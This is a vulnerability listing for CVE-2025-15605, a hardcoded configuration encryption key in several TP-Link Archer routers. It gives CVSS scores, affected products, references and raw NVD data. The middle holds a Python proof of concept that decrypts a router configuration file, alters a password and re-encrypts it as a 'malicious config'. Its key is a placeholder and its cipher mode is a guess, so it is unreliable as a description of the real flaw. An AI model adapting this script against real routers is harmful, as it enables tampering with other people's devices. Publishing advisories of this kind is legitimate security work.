CVE-2025-15605

Description

A hardcoded cryptographic key within the configuration mechanism on TP-Link Archer NX200, NX210, NX500 and NX600 enables decryption and re-encryption of device configuration data. An authenticated attacker may decrypt configuration files, modify them, and re-encrypt them, affecting the confidentiality and integrity of device configuration data.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:archer_nx600:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

TP-Link Archer NX200

TP-Link Archer NX210

TP-Link Archer NX500

TP-Link Archer NX600

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual Proof of Concept for CVE-2025-15605
# This script demonstrates how to decrypt and re-encrypt configuration
# using a hardcoded key extracted from the device firmware.

import binascii
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad, pad

# Placeholder for the hardcoded key found in the firmware
# Actual key needs to be extracted from the specific device model
HARDCODED_KEY = binascii.unhexlify('0123456789ABCDEF0123456789ABCDEF') 

def decrypt_config(encrypted_file_path):
    """Decrypts the device configuration file using the hardcoded key."""
    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()
        
        # Assuming AES-ECB mode is used based on common vendor implementations
        cipher = AES.new(HARDCODED_KEY, AES.MODE_ECB)
        decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)
        
        print("[+] Decryption successful.")
        return decrypted_data.decode('utf-8')
    except Exception as e:
        print(f"[-] Decryption failed: {e}")
        return None

def encrypt_and_malicious_modify(config_content, output_file_path):
    """Modifies config and re-encrypts it to upload back to the device."""
    try:
        # Example modification: changing admin password or settings
        modified_content = config_content.replace('old_password', 'new_password')
        
        cipher = AES.new(HARDCODED_KEY, AES.MODE_ECB)
        encrypted_data = cipher.encrypt(pad(modified_content.encode('utf-8'), AES.block_size))
        
        with open(output_file_path, 'wb') as f:
            f.write(encrypted_data)
            
        print(f"[+] Malicious config encrypted and saved to {output_file_path}")
    except Exception as e:
        print(f"[-] Encryption failed: {e}")

# Usage Example
# config = decrypt_config('config.bin')
# if config:
#     encrypt_and_malicious_modify(config, 'malicious_config.bin')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15605
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15605
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15605/
[4] VulDB https://vuldb.com/cve/CVE-2025-15605
[5] https://www.tp-link.com/en/support/download/archer-nx200/#Firmware
[6] https://www.tp-link.com/en/support/download/archer-nx210/#Firmware
[7] https://www.tp-link.com/en/support/download/archer-nx500/#Firmware
[8] https://www.tp-link.com/en/support/download/archer-nx600/#Firmware
[9] https://www.tp-link.com/us/support/faq/5027/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15605", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T18:16:24.067", "lastModified": "2026-03-31T19:04:37.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A hardcoded cryptographic key within the configuration mechanism on TP-Link Archer NX200, NX210, NX500 and NX600 enables decryption and re-encryption of device configuration data. An authenticated attacker may decrypt configuration files, modify them, and re-encrypt them, affecting the confidentiality and integrity of device configuration data."}, {"lang": "es", "value": "Una clave criptográfica codificada de forma rígida dentro del mecanismo de configuración en TP-Link Archer NX200, NX210, NX500 y NX600 permite el descifrado y recifrado de los datos de configuración del dispositivo. Un atacante autenticado puede descifrar archivos de configuración, modificarlos y recifrarlos, afectando la confidencialidad y la integridad de los datos de configuración del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "77429691-1193-4480-A64E-E1FB19D6A073"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "58132EDD-47B7-4E46-B280-FE58A920AE43"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "70EF52E9-1D92-4778-99C5-3B76B81681FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "40D78DBB-CAEA-4C2E-B703-2898B73A0A5E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "22EA51B1-332E-48BB-BDBA-09A99ECB942F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA336E76-7910-4780-BCA0-1DA2AA7F9418"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "48125D02-70B1-4448-BB33-47 ... (truncated)